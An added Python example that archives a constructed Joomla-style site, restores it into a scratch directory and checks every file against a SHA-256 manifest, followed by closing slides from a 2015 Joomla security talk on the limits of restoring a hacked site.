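"Test your backup" means restoring it somewhere harmless and proving the files match, not just checking that the archive exists. The following is an added example, not from the slides and not one of the extensions they list: it archives a site tree with tarfile, records a SHA-256 manifest at backup time, restores the archive into a scratch directory and compares every file against the manifest, so a truncated, tampered or stale archive is caught before the day it is needed. The site tree is constructed in a temporary directory; the database dump is assumed to be just another file in the tree (mysqldump needs a live server and is out of scope here).

```python
"""Make a file backup and prove it restores: the "test your backup" step (added example)."""
import hashlib
import os
import tarfile
import tempfile


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def manifest(root):
    """Map relative path -> sha256 for every regular file under root."""
    out = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            out[os.path.relpath(path, root)] = sha256_file(path)
    return out


def backup(root, archive_path):
    """Archive root into a gzip tarball and return the manifest taken at backup time."""
    files = manifest(root)
    with tarfile.open(archive_path, "w:gz") as tar:
        tar.add(root, arcname="site", recursive=True)
    return files


def verify_backup(archive_path, expected):
    """Restore into a scratch directory and return the problems found (empty list = verified)."""
    scratch = tempfile.mkdtemp(prefix="restore-test-")
    with tarfile.open(archive_path, "r:gz") as tar:
        try:
            tar.extractall(scratch, filter="data")  # refuses path-traversal entries (Python 3.12+ and backports)
        except TypeError:
            tar.extractall(scratch)                  # older Python: no filter argument
    restored = manifest(os.path.join(scratch, "site"))
    problems = []
    for rel, digest in expected.items():
        if rel not in restored:
            problems.append(f"missing after restore: {rel}")
        elif restored[rel] != digest:
            problems.append(f"content differs: {rel}")
    for rel in restored.keys() - expected.keys():
        problems.append(f"unexpected file in archive: {rel}")
    return problems


def make_site_tree():
    """Constructed sample site: config, an upload and a stand-in for the database dump."""
    root = tempfile.mkdtemp(prefix="joomla-")
    os.makedirs(os.path.join(root, "images"))
    samples = {
        "configuration.php": b"<?php class JConfig { public $secret = 'constructed'; }\n",
        os.path.join("images", "logo.png"): b"\x89PNG constructed sample\n",
        "site.sql": b"-- stands in for mysqldump output\n",
    }
    for rel, body in samples.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(body)
    return root


def demo():
    """Back up the sample, verify it, then show a manifest mismatch being caught."""
    root = make_site_tree()
    archive = os.path.join(tempfile.mkdtemp(prefix="backups-"), "site.tar.gz")
    expected = backup(root, archive)
    clean = verify_backup(archive, expected)
    tampered = dict(expected)
    tampered["configuration.php"] = "0" * 64  # content changed since the manifest was taken
    tampered["missing.sql"] = "0" * 64        # a file the archive never captured
    return clean, verify_backup(archive, tampered)


if __name__ == "__main__":
    clean, caught = demo()
    print("clean restore:", clean or "verified")
    print("tampered manifest:", caught)
```

Keep the manifest with the backup but on separate media from the site itself: if an intruder can rewrite both the files and the manifest, the check proves nothing, and an attacker who gets the backup archive gets configuration.php and the database credentials with it, so encrypt backups at rest.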

Page 52: Joomla! security jday2015

Joomla! Security
Restoring a hacked site from a backup

• Fixes the obvious problems
• Does not address:
  • Hidden hacks
  • Shell scripts
  • Backdoors
  • Zombies
  • Continuing vulnerabilities (the hole that let the attacker in is restored along with the backup)
  • Impacts of data exposure

Photo: flickr.com/photos/andreweason

Page 53: Joomla! security jday2015

The End

Shaiffulnizam Mohamad
OWASP member since 2010
Involved in every Joomla Day Malaysia since 2007
Specializing in Joomla! and security.

[email protected] / 0129531452

Joomla! Security